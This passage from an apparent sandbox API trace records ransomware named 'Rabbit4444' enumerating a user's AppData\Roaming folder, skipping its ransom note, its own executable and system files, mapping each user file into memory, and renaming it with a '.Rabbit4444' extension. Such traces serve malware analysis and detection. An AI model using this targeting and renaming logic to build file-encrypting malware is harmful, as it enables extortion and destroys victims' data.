Flags=0x0, Size=0x13) returned 0xf6568 [0050.284] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x42) returned 0x10b740 [0050.284] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6570 | out: ListHead=0xf68b0, ListEntry=0xf6570) returned 0xf6510 [0050.284] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xcd5192d4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xcd5192d4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0050.284] lstrcmpiW (lpString1="Roaming", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.284] lstrcmpiW (lpString1="Roaming", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.284] lstrcmpiW (lpString1="Roaming", lpString2="Rabbit4444.exe") returned 1 [0050.284] lstrcmpiW (lpString1="Roaming", lpString2=".") returned 1 [0050.284] lstrcmpiW (lpString1="Roaming", lpString2="..") returned 1 [0050.284] lstrcmpiW (lpString1="Roaming", lpString2="windows") returned -1 [0050.284] lstrcmpiW (lpString1="Roaming", lpString2="bootmgr") returned 1 [0050.284] lstrcmpiW (lpString1="Roaming", lpString2="pagefile.sys") returned 1 [0050.284] lstrcmpiW (lpString1="Roaming", lpString2="boot") returned 1 [0050.284] lstrcmpiW (lpString1="Roaming", lpString2="ids.txt") returned 1 [0050.284] lstrcmpiW (lpString1="Roaming", lpString2="NTUSER.DAT") returned 1 [0050.284] lstrcpyW (in: lpString1=0x130eb68, lpString2="Roaming" | out: lpString1="Roaming") returned="Roaming" [0050.284] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0050.284] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x40) returned 0x114c10 [0050.284] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6570 [0050.284] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xcd5192d4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xcd5192d4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0050.284] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0050.284] lstrcpyW (in: lpString1=0x130eb68, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.284] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.286] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.286] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.286] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.286] CloseHandle (hObject=0x278) returned 1 [0050.286] CloseHandle (hObject=0x27c) returned 1 [0050.286] GetCurrentThreadId () returned 0xd98 [0050.286] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0050.286] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0050.286] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x114c10 | out: hHeap=0xe0000) returned 1 [0050.286] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0050.286] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0050.286] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0050.287] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\.BFC0E91B00AE8A0620D3" [0050.287] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.287] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.290] FlushFileBuffers (hFile=0x27c) returned 1 [0050.291] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.291] CloseHandle (hObject=0x27c) returned 1 [0050.291] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming") returned 31 [0050.291] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.291] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xcd5192d4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe74c4f89, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0050.292] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.292] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.292] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.292] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.292] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xcd5192d4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe74c4f89, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.292] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.292] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.292] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.292] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.292] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.292] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe74c4f89, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe74c4f89, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe74c4f89, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.292] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.292] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.292] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe14cf160, ftCreationTime.dwHighDateTime=0x1d4cbf1, ftLastAccessTime.dwLowDateTime=0x9cd4b3a0, ftLastAccessTime.dwHighDateTime=0x1d4c70b, ftLastWriteTime.dwLowDateTime=0x9cd4b3a0, ftLastWriteTime.dwHighDateTime=0x1d4c70b, nFileSizeHigh=0x0, nFileSizeLow=0x2e8a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0UQahDxA.m4a", cAlternateFileName="")) returned 1 [0050.292] lstrcmpiW (lpString1="0UQahDxA.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.292] lstrcmpiW (lpString1="0UQahDxA.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.292] lstrcmpiW (lpString1="0UQahDxA.m4a", lpString2="Rabbit4444.exe") returned -1 [0050.292] lstrcmpiW (lpString1="0UQahDxA.m4a", lpString2=".") returned 1 [0050.292] lstrcmpiW (lpString1="0UQahDxA.m4a", lpString2="..") returned 1 [0050.292] lstrcmpiW (lpString1="0UQahDxA.m4a", lpString2="windows") returned -1 [0050.292] lstrcmpiW (lpString1="0UQahDxA.m4a", lpString2="bootmgr") returned -1 [0050.292] lstrcmpiW (lpString1="0UQahDxA.m4a", lpString2="pagefile.sys") returned -1 [0050.292] lstrcmpiW (lpString1="0UQahDxA.m4a", lpString2="boot") returned -1 [0050.292] lstrcmpiW (lpString1="0UQahDxA.m4a", lpString2="ids.txt") returned -1 [0050.292] lstrcmpiW (lpString1="0UQahDxA.m4a", lpString2="NTUSER.DAT") returned -1 [0050.292] lstrcpyW (in: lpString1=0x130eb78, lpString2="0UQahDxA.m4a" | out: lpString1="0UQahDxA.m4a") returned="0UQahDxA.m4a" [0050.292] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\0UQahDxA.m4a", dwFileAttributes=0x0) returned 1 [0050.293] lstrlenW (lpString="0UQahDxA.m4a") returned 12 [0050.293] lstrlenW (lpString="Rabbit4444") returned 10 [0050.293] lstrcmpiW (lpString1="QahDxA.m4a", lpString2="Rabbit4444") returned -1 [0050.293] lstrlenW (lpString=".dll") returned 4 [0050.293] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0050.293] lstrlenW (lpString=".lnk") returned 4 [0050.293] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0050.293] lstrlenW (lpString=".ini") returned 4 [0050.293] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0050.293] lstrlenW (lpString=".sys") returned 4 [0050.293] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0050.293] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\0UQahDxA.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\0uqahdxa.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.293] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.293] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14160377915) returned 1 [0050.293] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=11914) returned 1 [0050.293] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0050.293] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0050.293] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3190, lpName=0x0) returned 0x298 [0050.293] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3190) returned 0x70000 [0050.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0050.294] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.294] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.295] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.295] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.295] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0050.295] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14160546261) returned 1 [0050.295] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0050.295] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0050.295] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.295] CloseHandle (hObject=0x298) returned 1 [0050.295] CloseHandle (hObject=0x278) returned 1 [0050.296] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\0UQahDxA.m4a.Rabbit4444") returned 55 [0050.296] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\0UQahDxA.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\0uqahdxa.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\0UQahDxA.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\0uqahdxa.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.296] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a3fcbe0, ftCreationTime.dwHighDateTime=0x1d4d488, ftLastAccessTime.dwLowDateTime=0x7d8796b0, ftLastAccessTime.dwHighDateTime=0x1d4d4a4, ftLastWriteTime.dwLowDateTime=0x7d8796b0, ftLastWriteTime.dwHighDateTime=0x1d4d4a4, nFileSizeHigh=0x0, nFileSizeLow=0x16c62, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2oLQAuOM3KfTs0.odt", cAlternateFileName="2OLQAU~1.ODT")) returned 1 [0050.296] lstrcmpiW (lpString1="2oLQAuOM3KfTs0.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.296] lstrcmpiW (lpString1="2oLQAuOM3KfTs0.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.296] lstrcmpiW (lpString1="2oLQAuOM3KfTs0.odt", lpString2="Rabbit4444.exe") returned -1 [0050.296] lstrcmpiW (lpString1="2oLQAuOM3KfTs0.odt", lpString2=".") returned 1 [0050.296] lstrcmpiW (lpString1="2oLQAuOM3KfTs0.odt", lpString2="..") returned 1 [0050.296] lstrcmpiW (lpString1="2oLQAuOM3KfTs0.odt", lpString2="windows") returned -1 [0050.296] lstrcmpiW (lpString1="2oLQAuOM3KfTs0.odt", lpString2="bootmgr") returned -1 [0050.296] lstrcmpiW (lpString1="2oLQAuOM3KfTs0.odt", lpString2="pagefile.sys") returned -1 [0050.296] lstrcmpiW (lpString1="2oLQAuOM3KfTs0.odt", lpString2="boot") returned -1 [0050.296] lstrcmpiW (lpString1="2oLQAuOM3KfTs0.odt", lpString2="ids.txt") returned -1 [0050.296] lstrcmpiW (lpString1="2oLQAuOM3KfTs0.odt", lpString2="NTUSER.DAT") returned -1 [0050.296] lstrcpyW (in: lpString1=0x130eb78, lpString2="2oLQAuOM3KfTs0.odt" | out: lpString1="2oLQAuOM3KfTs0.odt") returned="2oLQAuOM3KfTs0.odt" [0050.296] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\2oLQAuOM3KfTs0.odt", dwFileAttributes=0x0) returned 1 [0050.297] lstrlenW (lpString="2oLQAuOM3KfTs0.odt") returned 18 [0050.297] lstrlenW (lpString="Rabbit4444") returned 10 [0050.297] lstrcmpiW (lpString1="3KfTs0.odt", lpString2="Rabbit4444") returned -1 [0050.297] lstrlenW (lpString=".dll") returned 4 [0050.297] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0050.297] lstrlenW (lpString=".lnk") returned 4 [0050.297] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0050.297] lstrlenW (lpString=".ini") returned 4 [0050.297] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0050.297] lstrlenW (lpString=".sys") returned 4 [0050.297] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0050.297] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\2oLQAuOM3KfTs0.odt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\2olqauom3kfts0.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.297] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.297] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14160782289) returned 1 [0050.297] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=93282) returned 1 [0050.297] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0050.297] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0050.297] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16f70, lpName=0x0) returned 0x298 [0050.297] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16f70) returned 0x70000 [0050.299] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.299] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0050.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0050.300] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0050.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0050.300] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14161067636) returned 1 [0050.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0050.300] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0050.300] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.301] CloseHandle (hObject=0x298) returned 1 [0050.301] CloseHandle (hObject=0x278) returned 1 [0050.302] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\2oLQAuOM3KfTs0.odt.Rabbit4444") returned 61 [0050.302] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\2oLQAuOM3KfTs0.odt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\2olqauom3kfts0.odt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\2oLQAuOM3KfTs0.odt.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\2olqauom3kfts0.odt.rabbit4444"), dwFlags=0x1) returned 1 [0050.302] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dec1460, ftCreationTime.dwHighDateTime=0x1d4c750, ftLastAccessTime.dwLowDateTime=0x49db68d0, ftLastAccessTime.dwHighDateTime=0x1d4d2d5, ftLastWriteTime.dwLowDateTime=0x49db68d0, ftLastWriteTime.dwHighDateTime=0x1d4d2d5, nFileSizeHigh=0x0, nFileSizeLow=0x108db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="88ufiGMYBLxXyRM.wav", cAlternateFileName="88UFIG~1.WAV")) returned 1 [0050.302] lstrcmpiW (lpString1="88ufiGMYBLxXyRM.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.302] lstrcmpiW (lpString1="88ufiGMYBLxXyRM.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.302] lstrcmpiW (lpString1="88ufiGMYBLxXyRM.wav", lpString2="Rabbit4444.exe") returned -1 [0050.302] lstrcmpiW (lpString1="88ufiGMYBLxXyRM.wav", lpString2=".") returned 1 [0050.302] lstrcmpiW (lpString1="88ufiGMYBLxXyRM.wav", lpString2="..") returned 1 [0050.302] lstrcmpiW (lpString1="88ufiGMYBLxXyRM.wav", lpString2="windows") returned -1 [0050.302] lstrcmpiW (lpString1="88ufiGMYBLxXyRM.wav", lpString2="bootmgr") returned -1 [0050.302] lstrcmpiW (lpString1="88ufiGMYBLxXyRM.wav", lpString2="pagefile.sys") returned -1 [0050.302] lstrcmpiW (lpString1="88ufiGMYBLxXyRM.wav", lpString2="boot") returned -1 [0050.302] lstrcmpiW (lpString1="88ufiGMYBLxXyRM.wav", lpString2="ids.txt") returned -1 [0050.302] lstrcmpiW (lpString1="88ufiGMYBLxXyRM.wav", lpString2="NTUSER.DAT") returned -1 [0050.302] lstrcpyW (in: lpString1=0x130eb78, lpString2="88ufiGMYBLxXyRM.wav" | out: lpString1="88ufiGMYBLxXyRM.wav") returned="88ufiGMYBLxXyRM.wav" [0050.302] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\88ufiGMYBLxXyRM.wav", dwFileAttributes=0x0) returned 1 [0050.303] lstrlenW (lpString="88ufiGMYBLxXyRM.wav") returned 19 [0050.303] lstrlenW (lpString="Rabbit4444") returned 10 [0050.303] lstrcmpiW (lpString1="LxXyRM.wav", lpString2="Rabbit4444") returned -1 [0050.303] lstrlenW (lpString=".dll") returned 4 [0050.303] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0050.303] lstrlenW (lpString=".lnk") returned 4 [0050.303] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0050.303] lstrlenW (lpString=".ini") returned 4 [0050.303] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0050.303] lstrlenW (lpString=".sys") returned 4 [0050.303] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0050.303] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\88ufiGMYBLxXyRM.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\88ufigmyblxxyrm.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.303] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.303] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14161380804) returned 1 [0050.303] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=67803) returned 1 [0050.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0050.303] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0050.303] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10be0, lpName=0x0) returned 0x298 [0050.303] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10be0) returned 0x70000 [0050.305] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.305] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.305] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.305] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.305] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.305] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.305] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.305] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.305] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14161615793) returned 1 [0050.305] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0050.305] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0050.306] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.306] CloseHandle (hObject=0x298) returned 1 [0050.306] CloseHandle (hObject=0x278) returned 1 [0050.307] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\88ufiGMYBLxXyRM.wav.Rabbit4444") returned 62 [0050.307] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\88ufiGMYBLxXyRM.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\88ufigmyblxxyrm.wav"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\88ufiGMYBLxXyRM.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\88ufigmyblxxyrm.wav.rabbit4444"), dwFlags=0x1) returned 1 [0050.307] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23786e70, 